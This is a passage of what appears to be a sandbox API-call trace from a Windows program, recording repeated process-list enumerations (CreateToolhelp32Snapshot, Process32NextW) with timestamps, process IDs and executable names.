lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0127.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0127.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0127.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0127.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0127.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0127.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0127.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0127.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0127.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0127.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0127.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0127.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0127.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0127.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0127.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0127.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0127.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0127.421] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.422] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0127.423] CloseHandle (hObject=0xc4) returned 1 [0127.423] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0127.428] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0127.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0127.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0127.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0127.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0127.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0127.434] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0127.434] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.437] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0127.438] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0127.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.443] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0127.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0127.500] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0127.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.502] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.503] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0127.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0127.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0127.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0127.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0127.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0127.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0127.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0127.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0127.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0127.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0127.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0127.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0127.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0127.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0127.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0127.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0127.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0127.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0127.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0127.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0127.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0127.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0127.532] CloseHandle (hObject=0xbc) returned 1 [0127.532] Sleep (dwMilliseconds=0x12c) [0127.892] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0127.899] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0127.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0127.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0127.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0127.905] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0127.906] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0127.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0127.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, 